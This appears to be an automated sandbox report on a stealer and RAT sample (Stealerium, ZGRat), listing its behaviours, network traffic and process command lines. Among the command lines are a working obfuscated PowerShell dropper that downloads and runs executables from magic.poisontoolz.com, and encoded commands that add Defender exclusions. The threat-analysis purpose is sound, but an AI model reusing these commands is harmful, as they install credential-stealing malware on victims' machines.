Analysis Overview
SHA256
84765d5c0c038297793d431f04f2096bfce69ca41c50696c36bc0f3ba1369c05
Threat Level: Known bad
The file magic.poisontoolz.com.zip was found to be: Known bad.
Malicious Activity Summary
Stealerium
ZGRat
Detect ZGRat V1
Blocklisted process makes network request
Downloads MZ/PE file
Drops startup file
Executes dropped EXE
Checks computer location settings
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
Enumerates connected drives
Looks up external IP address via web service
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Suspicious use of FindShellTrayWindow
outlook_office_path
Suspicious behavior: EnumeratesProcesses
outlook_win_path
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Checks processor information in registry
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-19 20:19
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral10
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:23
Platform
win10v2004-20231215-en
Max time kernel
93s
Max time network
149s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1232405761-1209240240-3206092754-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Jafxaspdhim.vdf
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.160.77.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.179.17.96.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-01-19 20:19
Reported
2024-01-19 20:24
Platform
win10v2004-20231215-en
Max time kernel
156s
Max time network
174s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ZGRat
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
Reads user/profile data of web browsers
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4080 set thread context of 556 | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | C:\Users\Admin\AppData\Roaming\yagacrypt.exe |
| PID 3152 set thread context of 1592 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe |
| PID 1592 set thread context of 1092 | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 1092 set thread context of 1708 | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe |
| PID 3416 set thread context of 3460 | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | C:\Users\Admin\AppData\Local\Temp\ggiac.exe |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1815711207-1844170477-3539718864-1000_Classes\Local Settings | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\yagacrypt.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\ggiac.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\fox.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function hPhLUO($gYYfVUqro, $TDHCoMacW){[IO.File]::WriteAllBytes($gYYfVUqro, $TDHCoMacW)};function OuyjBhDPrdGwPbLI($gYYfVUqro){if($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38832,38840,38840))) -eq $True){rundll32.exe $gYYfVUqro }elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38844,38847,38781))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $gYYfVUqro}elseif($gYYfVUqro.EndsWith((bGYiXoWxyxIAMYfHnL @(38778,38841,38847,38837))) -eq $True){misexec /qn /i $gYYfVUqro}else{Start-Process $gYYfVUqro}};function wZPwXqcGcNksDcvtMGB($uyaYBkDZCCSyzJDelsei){$iFRLJMGtgESMZFs = New-Object (bGYiXoWxyxIAMYfHnL @(38810,38833,38848,38778,38819,38833,38830,38799,38840,38837,38833,38842,38848));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$TDHCoMacW = $iFRLJMGtgESMZFs.DownloadData($uyaYBkDZCCSyzJDelsei);return $TDHCoMacW};function bGYiXoWxyxIAMYfHnL($NWBOMT){$RZDKPliAxJ=38732;$BhXTohPOo=$Null;foreach($eKsxkGZtQqIkdSPR in $NWBOMT){$BhXTohPOo+=[char]($eKsxkGZtQqIkdSPR-$RZDKPliAxJ)};return $BhXTohPOo};function gNBuaXtjuReBmDfHma(){$hIYbSEpsSJoZXPH = $env:AppData + '\';$YQPfBhOhZMdWRyHeqKPdf = $hIYbSEpsSJoZXPH + 'RIB.pdf';If(Test-Path -Path $YQPfBhOhZMdWRyHeqKPdf){Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;}Else{ $arPZzcSlEyncTeAIE = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38814,38805,38798,38778,38844,38832,38834));hPhLUO $YQPfBhOhZMdWRyHeqKPdf $arPZzcSlEyncTeAIE;Invoke-Item $YQPfBhOhZMdWRyHeqKPdf;};$RYunDk = $hIYbSEpsSJoZXPH + 'yagacrypt.exe'; if (Test-Path -Path $RYunDk){OuyjBhDPrdGwPbLI $RYunDk;}Else{ $ehQGZXVzn = wZPwXqcGcNksDcvtMGB (bGYiXoWxyxIAMYfHnL @(38836,38848,38848,38844,38847,38790,38779,38779,38841,38829,38835,38837,38831,38778,38844,38843,38837,38847,38843,38842,38848,38843,38843,38840,38854,38778,38831,38843,38841,38779,38853,38829,38835,38829,38831,38846,38853,38844,38848,38778,38833,38852,38833));hPhLUO $RYunDk $ehQGZXVzn;OuyjBhDPrdGwPbLI $RYunDk;};;;;}gNBuaXtjuReBmDfHma;
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\RIB.pdf"
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
"C:\Users\Admin\AppData\Roaming\yagacrypt.exe"
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=0C7AA00897205B0621305857D4844299 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4E8D65E53F52C2E793C436F7B299ADBD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4E8D65E53F52C2E793C436F7B299ADBD --renderer-client-id=2 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=3FDE9A082A75A0F1B85D6E2E64451CD6 --renderer-client-id=4 --mojo-platform-channel-handle=2284 --allow-no-sandbox-job /prefetch:1
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=52B0186A564DE3CD6194553D4ACAB064 --mojo-platform-channel-handle=2548 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=73AC7C45C0CF6A5E20EAE9DA9193AB63 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=3261FE8E9A19406519F4ABADEEF0918A --mojo-platform-channel-handle=2596 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
C:\Users\Admin\AppData\Roaming\yagacrypt.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Users\Admin\AppData\Local\IsInvalid\qlbpjel\LegalBlockSizes.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABMAGUAZwBhAGwAQgBsAG8AYwBrAFMAaQB6AGUAcwAuAGUAeABlADsA
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
C:\Users\Admin\AppData\Local\Temp\ggiac.exe
Network
| Country | Destination | Domain | Proto |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.179.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | magic.poisontoolz.com | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 81.171.91.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.10.21.104.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 5.179.17.96.in-addr.arpa | udp |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.166.126.56:443 | tcp | |
| GB | 23.37.0.169:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 20.114.59.183:443 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 104.77.160.14:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| N/A | 93.184.221.240:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.16.110.114:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| GB | 96.17.179.41:80 | tcp | |
| US | 8.8.8.8:53 | udp | |
| US | 8.8.8.8:53 | udp | |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 58.189.79.40.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | tcp | |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | 53.191.33.194.in-addr.arpa | udp |
| FR | 194.33.191.53:58001 | tcp | |
| US | 104.21.10.90:443 | magic.poisontoolz.com | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
Files
memory/1868-3-0x0000000004D20000-0x0000000004D30000-memory.dmp
memory/1868-2-0x0000000004D20000-0x0000000004D30000-memory.dmp
memory/1868-1-0x0000000071570000-0x0000000071D20000-memory.dmp
memory/1868-4-0x0000000005360000-0x0000000005988000-memory.dmp
memory/1868-0-0x00000000028C0000-0x00000000028F6000-memory.dmp
memory/1868-5-0x0000000005230000-0x0000000005252000-memory.dmp
memory/1868-12-0x0000000005BA0000-0x0000000005C06000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0naqnljo.j0i.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
